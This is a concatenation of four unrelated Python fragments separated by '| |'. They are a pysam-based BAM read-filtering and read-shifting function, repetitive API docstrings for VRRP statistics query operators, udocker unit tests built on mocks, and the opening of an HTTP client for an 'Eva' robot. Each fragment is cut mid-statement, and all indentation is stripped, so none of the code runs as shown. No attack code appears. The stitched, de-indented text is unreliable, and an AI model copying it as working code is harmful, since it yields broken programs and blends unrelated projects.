elif b.is_reverse and b.is_read2:
end += args.shift[1]
deltaTLen = args.shift[1] - args.shift[0]
elif not b.is_reverse and not b.is_read2:
start += args.shift[0]
deltaTLen = args.shift[1] - args.shift[0]
else:
start -= args.shift[3]
deltaTLen = args.shift[3] - args.shift[2]
# Sanity check
if end - start < 1:
if b.is_reverse:
start = end - 1
else:
end = start + 1
if start < 0:
start = 0
if end > chromDict[b.reference_name]:
end = chromDict[b.reference_name]
if end - start < 1:
return None
# create a new read
b2 = pysam.AlignedSegment()
b2.query_name = b.query_name
b2.flag = b.flag
b2.reference_id = b.reference_id
b2.reference_start = start
b2.mapping_quality = b.mapping_quality
b2.cigar = ((0, end - start),) # Returned cigar is only matches
if tLen < 0:
b2.template_length = tLen - deltaTLen
else:
b2.template_length = tLen + deltaTLen
b2.next_reference_id = b.next_reference_id
b2.next_reference_start = b.next_reference_start
if b.is_proper_pair:
if b2.is_read2 and b2.is_reverse:
b2.next_reference_start += args.shift[0]
elif not b2.is_read2 and b2.is_reverse:
b2.next_reference_start -= args.shift[3]
return b2
def filterWorker(arglist):
chrom, start, end, args, chromDict = arglist
fh = openBam(args.bam)
mode = 'wbu'
oname = getTempFileName(suffix='.bam')
if args.filteredOutReads:
onameFiltered = getTempFileName(suffix='.bam')
else:
onameFiltered = None
ofh = pysam.AlignmentFile(oname, mode=mode, template=fh)
if onameFiltered:
ofiltered = pysam.AlignmentFile(onameFiltered, mode=mode, template=fh)
else:
ofiltered = None
prev_pos = set()
lpos = None
nFiltered = 0
total = 0
for read in fh.fetch(chrom, start, end):
if read.pos < start:
# ensure that we never double count (in case distanceBetweenBins == 0)
continue
total += 1
if read.flag & 4:
# Ignore unmapped reads, they were counted already
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.minMappingQuality and read.mapq < args.minMappingQuality:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.samFlagInclude and read.flag & args.samFlagInclude != args.samFlagInclude:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.samFlagExclude and read.flag & args.samFlagExclude != 0:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
tLen = getTLen(read)
if args.minFragmentLength > 0 and tLen < args.minFragmentLength:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.maxFragmentLength > 0 and tLen > args.maxFragmentLength:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.ignoreDuplicates:
# Assuming more or less concordant reads, use the fragment bounds, otherwise the start positions
if tLen >= 0:
s = read.pos
e = s + tLen
else:
s = read.pnext
e = s - tLen
if read.reference_id != read.next_reference_id:
e = read.pnext
if lpos is not None and lpos == read.reference_start \
and (s, e, read.next_reference_id, read.is_reverse) in prev_pos:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if lpos != read.reference_start:
prev_pos.clear()
lpos = read.reference_start
prev_pos.add((s, e, read.next_reference_id, read.is_reverse))
# filterRNAstrand
if args.filterRNAstrand:
if read.is_paired:
if args.filterRNAstrand == 'forward':
if read.flag & 144 == 128 or read.flag & 96 == 64:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
elif args.filterRNAstrand == 'reverse':
if read.flag & 144 == 144 or read.flag & 96 == 96:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
else:
if args.filterRNAstrand == 'forward':
if read.flag & 16 == 16:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
elif args.filterRNAstrand == 'reverse':
if read.flag & 16 == 0:
pass
else:
nFiltered += 1
if ofiltered:
ofiltered.write(read)
continue
if args.shift:
read = shiftRead(read, chromDict, args)
if not read:
continue
# Read survived filtering
ofh.write(read)
# The results from the workers will get sorted, so get the | |
specified.
:type val_f_VrrpAdvertiseIntervalErrors: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAdvertiseIntervalErrors: If op_VrrpAdvertiseIntervalErrors is specified, this value will be compared to the value in VrrpAdvertiseIntervalErrors using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAdvertiseIntervalErrors must be specified if op_VrrpAdvertiseIntervalErrors is specified.
:type val_c_VrrpAdvertiseIntervalErrors: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpAdvertiseRcvd: The operator to apply to the field VrrpAdvertiseRcvd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAdvertiseRcvd: The received advertise of the Vrrp router statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpAdvertiseRcvd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpAdvertiseRcvd: If op_VrrpAdvertiseRcvd is specified, the field named in this input will be compared to the value in VrrpAdvertiseRcvd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAdvertiseRcvd must be specified if op_VrrpAdvertiseRcvd is specified.
:type val_f_VrrpAdvertiseRcvd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAdvertiseRcvd: If op_VrrpAdvertiseRcvd is specified, this value will be compared to the value in VrrpAdvertiseRcvd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAdvertiseRcvd must be specified if op_VrrpAdvertiseRcvd is specified.
:type val_c_VrrpAdvertiseRcvd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpAuthFailures: The operator to apply to the field VrrpAuthFailures. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAuthFailures: The total number of authentication failures occurred in the Vrrp router statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpAuthFailures: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpAuthFailures: If op_VrrpAuthFailures is specified, the field named in this input will be compared to the value in VrrpAuthFailures using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAuthFailures must be specified if op_VrrpAuthFailures is specified.
:type val_f_VrrpAuthFailures: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAuthFailures: If op_VrrpAuthFailures is specified, this value will be compared to the value in VrrpAuthFailures using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAuthFailures must be specified if op_VrrpAuthFailures is specified.
:type val_c_VrrpAuthFailures: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpAuthTypeMismatch: The operator to apply to the field VrrpAuthTypeMismatch. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpAuthTypeMismatch: The mismatch authentication type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpAuthTypeMismatch: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpAuthTypeMismatch: If op_VrrpAuthTypeMismatch is specified, the field named in this input will be compared to the value in VrrpAuthTypeMismatch using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpAuthTypeMismatch must be specified if op_VrrpAuthTypeMismatch is specified.
:type val_f_VrrpAuthTypeMismatch: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpAuthTypeMismatch: If op_VrrpAuthTypeMismatch is specified, this value will be compared to the value in VrrpAuthTypeMismatch using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpAuthTypeMismatch must be specified if op_VrrpAuthTypeMismatch is specified.
:type val_c_VrrpAuthTypeMismatch: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpBecomeMaster: The operator to apply to the field VrrpBecomeMaster. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpBecomeMaster: The master of the Vrrp Router Statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpBecomeMaster: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpBecomeMaster: If op_VrrpBecomeMaster is specified, the field named in this input will be compared to the value in VrrpBecomeMaster using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpBecomeMaster must be specified if op_VrrpBecomeMaster is specified.
:type val_f_VrrpBecomeMaster: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpBecomeMaster: If op_VrrpBecomeMaster is specified, this value will be compared to the value in VrrpBecomeMaster using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpBecomeMaster must be specified if op_VrrpBecomeMaster is specified.
:type val_c_VrrpBecomeMaster: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpInvalidAuthType: The operator to apply to the field VrrpInvalidAuthType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpInvalidAuthType: The Invalid Authentication type of Vrrp Router Statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpInvalidAuthType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_VrrpInvalidAuthType: If op_VrrpInvalidAuthType is specified, the field named in this input will be compared to the value in VrrpInvalidAuthType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_VrrpInvalidAuthType must be specified if op_VrrpInvalidAuthType is specified.
:type val_f_VrrpInvalidAuthType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_VrrpInvalidAuthType: If op_VrrpInvalidAuthType is specified, this value will be compared to the value in VrrpInvalidAuthType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_VrrpInvalidAuthType must be specified if op_VrrpInvalidAuthType is specified.
:type val_c_VrrpInvalidAuthType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_VrrpInvalidTypePktsRcvd: The operator to apply to the field VrrpInvalidTypePktsRcvd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. VrrpInvalidTypePktsRcvd: The packet received with Invalid Type. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_VrrpInvalidTypePktsRcvd: String
| ``api version min:`` None
| ``api version max:`` | |
= udoc.do_rmi(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.isprotected_imagerepo.return_value = True
status = udoc.do_rmi(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.isprotected_imagerepo.return_value = False
status = udoc.do_rmi(mock_cmdp)
self.assertTrue(status)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_21_do_protect(self, mock_local, mock_msg, mock_dioapi,
mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
"""Test21 Udocker().do_protect()."""
self._init()
mock_msg.level = 0
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
status = udoc.do_protect(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_local.protect_container.return_value = False
status = udoc.do_protect(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_local.protect_container.return_value = True
status = udoc.do_protect(mock_cmdp)
self.assertTrue(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("", "TAG")
mock_local.get_container_id.return_value = ""
mock_local.protect_imagerepo.return_value = True
status = udoc.do_protect(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = ""
mock_local.protect_imagerepo.return_value = True
status = udoc.do_protect(mock_cmdp)
self.assertTrue(status)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_22_do_unprotect(self, mock_local, mock_msg, mock_dioapi,
mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
"""Test22 Udocker().do_unprotect()."""
self._init()
mock_msg.level = 0
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
status = udoc.do_unprotect(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_local.unprotect_container.return_value = False
status = udoc.do_unprotect(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_local.unprotect_container.return_value = True
status = udoc.do_unprotect(mock_cmdp)
self.assertTrue(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = ""
mock_local.unprotect_imagerepo.return_value = True
status = udoc.do_unprotect(mock_cmdp)
self.assertTrue(status)
self.assertTrue(mock_local.unprotect_imagerepo.called)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_23_do_name(self, mock_local, mock_msg, mock_dioapi,
mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
"""Test23 Udocker().do_name()."""
self._init()
mock_msg.level = 0
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
status = udoc.do_name(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "NAME", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = ""
status = udoc.do_name(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "NAME", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_local.set_container_name.return_value = False
status = udoc.do_name(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "NAME", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_local.set_container_name.return_value = True
status = udoc.do_name(mock_cmdp)
self.assertTrue(status)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_24_do_rmname(self, mock_local, mock_msg, mock_dioapi,
mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
"""Test24 Udocker().do_rmname()."""
self._init()
mock_msg.level = 0
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
status = udoc.do_rmname(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["NAME", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.del_container_name.return_value = False
status = udoc.do_rmname(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["NAME", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.del_container_name.return_value = True
status = udoc.do_rmname(mock_cmdp)
self.assertTrue(status)
@mock.patch('udocker.json')
@mock.patch('udocker.ContainerStructure')
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_25_do_inspect(self, mock_local, mock_msg, mock_dioapi,
mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg,
mock_cstruct, mock_json):
"""Test25 Udocker().do_inspect()."""
self._init()
mock_msg.level = 0
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
status = udoc.do_inspect(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_cstruct.return_value.get_container_attr.return_value = ("", "")
status = udoc.do_inspect(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "PRINT", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_cstruct.return_value.get_container_attr.return_value = ("DIR", "")
status = udoc.do_inspect(mock_cmdp)
self.assertTrue(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.get_container_id.return_value = "123"
mock_cstruct.return_value.get_container_attr.return_value = (
"", "JSON")
status = udoc.do_inspect(mock_cmdp)
self.assertTrue(status)
@mock.patch('udocker.Udocker._check_imagespec')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.KeyStore')
@mock.patch('udocker.DockerLocalFileAPI')
@mock.patch('udocker.DockerIoAPI')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_26_do_verify(self, mock_local, mock_msg, mock_dioapi,
mock_dlocapi, mock_ks, mock_cmdp, mock_chkimg):
"""Test26 Udocker().do_verify()."""
self._init()
mock_msg.level = 0
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
status = udoc.do_verify(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("", "")
status = udoc.do_verify(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.cd_imagerepo.return_value = False
status = udoc.do_verify(mock_cmdp)
self.assertFalse(status)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = False
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
mock_chkimg.return_value = ("IMAGE", "TAG")
mock_local.cd_imagerepo.return_value = True
mock_local.verify_image.return_value = True
status = udoc.do_verify(mock_cmdp)
self.assertTrue(status)
# @mock.patch('udocker.ExecutionMode')
# @mock.patch('udocker.CmdParser')
# @mock.patch('udocker.KeyStore')
# @mock.patch('udocker.DockerLocalFileAPI')
# @mock.patch('udocker.DockerIoAPI')
# @mock.patch('udocker.Msg')
# @mock.patch('udocker.LocalRepository')
# def test_27_do_setup(self, mock_local, mock_msg, mock_dioapi,
# mock_dlocapi, mock_ks, mock_cmdp, mock_exec):
# """Test27 Udocker().do_setup()."""
# self._init()
# mock_msg.level = 0
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "", "" "", "", ]
# mock_local.cd_container.return_value = False
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_exec.set_mode.return_value = False
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_exec.set_mode.return_value = True
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "P1", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_local.isprotected_container.return_value = True
# mock_exec.set_mode.return_value = True
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
# udoc = udocker.Udocker(mock_local)
# mock_cmdp.missing_options.return_value = True
# mock_cmdp.get.side_effect = ["", "P1", "" "", "", ]
# mock_local.cd_container.return_value = True
# mock_local.isprotected_container.return_value = False
# mock_exec.set_mode.return_value = True
# status = udoc.do_setup(mock_cmdp)
# self.assertFalse(status)
@mock.patch('udocker.UdockerTools')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.Msg')
@mock.patch('udocker.LocalRepository')
def test_28_do_install(self, mock_local, mock_msg, mock_cmdp,
mock_utools):
"""Test28 Udocker().do_install()."""
self._init()
mock_msg.level = 0
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "" "", "", ]
status = udoc.do_install(mock_cmdp)
self.assertFalse(mock_utools.return_value.purge.called)
# self.assertTrue(mock_utools.return_value.install.called)
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "--purge", "" "", "", ]
mock_utools.reset_mock()
mock_cmdp.reset_mock()
status = udoc.do_install(mock_cmdp)
# self.assertTrue(mock_utools.return_value.purge.called)
self.assertTrue(mock_utools.return_value.install.called_with(False))
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "--purge", "--force" "", "", ]
mock_utools.reset_mock()
mock_cmdp.reset_mock()
status = udoc.do_install(mock_cmdp)
# self.assertTrue(mock_utools.return_value.purge.called)
self.assertTrue(mock_utools.return_value.install.called_with(True))
udoc = udocker.Udocker(mock_local)
mock_cmdp.missing_options.return_value = True
mock_cmdp.get.side_effect = ["", "", "--force" "", "", ]
mock_utools.reset_mock()
mock_cmdp.reset_mock()
status = udoc.do_install(mock_cmdp)
# self.assertFalse(mock_utools.return_value.purge.called)
self.assertTrue(mock_utools.return_value.install.called_with(True))
@mock.patch('udocker.Msg.out')
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.LocalRepository')
def test_29_do_help(self, mock_local, mock_cmdp, mock_msgout):
"""Test29 Udocker().do_help()."""
self._init()
udoc = udocker.Udocker(mock_local)
mock_cmdp.get.side_effect = ["run", "help", "" "", "", ]
udoc.do_help(mock_cmdp)
self.assertTrue(mock_msgout.called)
@mock.patch('udocker.CmdParser')
@mock.patch('udocker.LocalRepository')
def test_30_do_version(self, mock_local, mock_cmdp):
"""Test30 Udocker().do_version()."""
self._init()
udoc = udocker.Udocker(mock_local)
mock_cmdp.get.side_effect = ["run", "", "" "", "", ]
version = udoc.do_version(mock_cmdp)
self.assertIsNotNone(version)
class CmdParserTestCase(unittest.TestCase):
"""Test CmdParserTestCase() command line interface."""
@classmethod
def setUpClass(cls):
"""Setup test."""
set_env()
def test_01__init(self):
"""Test01 CmdParser() Constructor."""
cmdp = udocker.CmdParser()
self.assertEqual(cmdp._argv, "")
self.assertIsInstance(cmdp._argv_split, dict)
self.assertIsInstance(cmdp._argv_consumed_options, dict)
self.assertIsInstance(cmdp._argv_consumed_params, dict)
self.assertEqual(cmdp._argv_split['CMD'], "")
self.assertEqual(cmdp._argv_split['GEN_OPT'], [])
self.assertEqual(cmdp._argv_split['CMD_OPT'], [])
self.assertEqual(cmdp._argv_consumed_options['GEN_OPT'], [])
self.assertEqual(cmdp._argv_consumed_options['CMD_OPT'], [])
self.assertEqual(cmdp._argv_consumed_params['GEN_OPT'], [])
self.assertEqual(cmdp._argv_consumed_params['CMD_OPT'], [])
def test_02_parse(self):
"""Test02 CmdParser().parse()."""
cmdp = udocker.CmdParser()
status = cmdp.parse("udocker run --bindhome "
"--hostauth --hostenv -v /sys"
" -v /proc -v /var/run -v /dev"
" --user=jorge --dri myfed firefox")
self.assertTrue(status)
def test_03_missing_options(self):
"""Test03 CmdParser().missing_options()."""
cmdp = udocker.CmdParser()
cmdp.parse("udocker run --bindhome "
"--hostauth --hostenv -v /sys"
" -v /proc -v /var/run -v /dev"
" --user=jorge --dri myfed firefox")
out = cmdp.missing_options()
self.assertIsInstance(out, list)
def test_04_get(self):
"""Test04 CmdParser().get()."""
cmdp = udocker.CmdParser()
cmdp.declare_options("-v= -e= -w= -u= -i -t -a")
cmdp.parse("udocker run --bindhome "
"--hostauth --hostenv -v | |
import json
import time
import logging
import requests
from .robot_state import RobotState
from .eva_errors import eva_error, EvaError, EvaAutoRenewError
# TODO add more granular logs using __logger
# TODO lots of sleeps in control_* de to the robot state being updated slowly after starting an action, can this be improved?
class EvaHTTPClient:
"""
Eva HTTP client
- host_ip (string): The IP address of an Eva, i.e. 192.168.1.245
- api_token (string): A valid API token for accessing Eva, retrievable from the Choreograph config page
- custom_logger (logging.Logger): An *optional* logger, if not supplied the client will instantiate its own
- request_timeout (float): An *optional* time in seconds to wait for a request to resolve, defaults to 5
- renew_period (int): An *optional* time in seconds between renew session requests, defaults to 20 minutes
"""
def __init__(self, host_ip, api_token, custom_logger=None, request_timeout=5, renew_period=60 * 20):
self.host_ip = host_ip
self.api_token = api_token
self.request_timeout = request_timeout
if custom_logger is not None:
self.__logger = custom_logger
else:
self.__logger = logging.getLogger('evasdk.EvaHTTPClient:{}'.format(host_ip))
self.session_token = None
self.renew_period = renew_period
self.__last_renew = time.time()
if not 0 < renew_period < 30 * 60:
raise ValueError('Session must be renewed before expiring (30 minutes)')
def api_call_with_auth(self, *args, **kwargs):
r = self.__api_request(*args, **kwargs)
# Try creating a new session if we get an auth error and retrying the failed request
if r.status_code == 401:
self.__logger.debug('Creating a new session and retrying failed request')
self.auth_create_session()
return self.__api_request(*args, **kwargs)
if self.renew_period < time.time() - self.__last_renew < 30 * 60:
self.__logger.debug('Automatically renewing session')
try:
self.auth_renew_session()
except EvaError as e:
raise EvaAutoRenewError('Failed to automatically renew, got error {}'.format(str(e)))
return r
def __api_request(self, method, path, payload=None, headers=None, timeout=None):
if not headers:
headers = {'Authorization': 'Bearer {}'.format(self.session_token)}
return requests.request(
method, 'http://{}/api/v1/{}'.format(self.host_ip, path),
data=payload, headers=headers,
timeout=(timeout or self.request_timeout),
)
# API VERSIONS
def api_versions(self):
r = self.__api_request('GET', 'versions')
if r.status_code != 200:
eva_error('api_versions request error', r)
return r.json()
# AUTH
def auth_renew_session(self):
self.__logger.debug('Renewing session token {}'.format(self.session_token))
# Bypass api_call_with_auth to avoid getting in a renewal loop
r = self.__api_request('POST', 'auth/renew')
if r.status_code == 401:
self.session_token = None
self.auth_create_session()
elif r.status_code != 204:
eva_error('auth_renew_session request error', r)
else:
self.__last_renew = time.time()
def auth_create_session(self):
self.__logger.debug('Creating session token')
# Bypass api_call_with_auth to avoid getting in a 401 loop
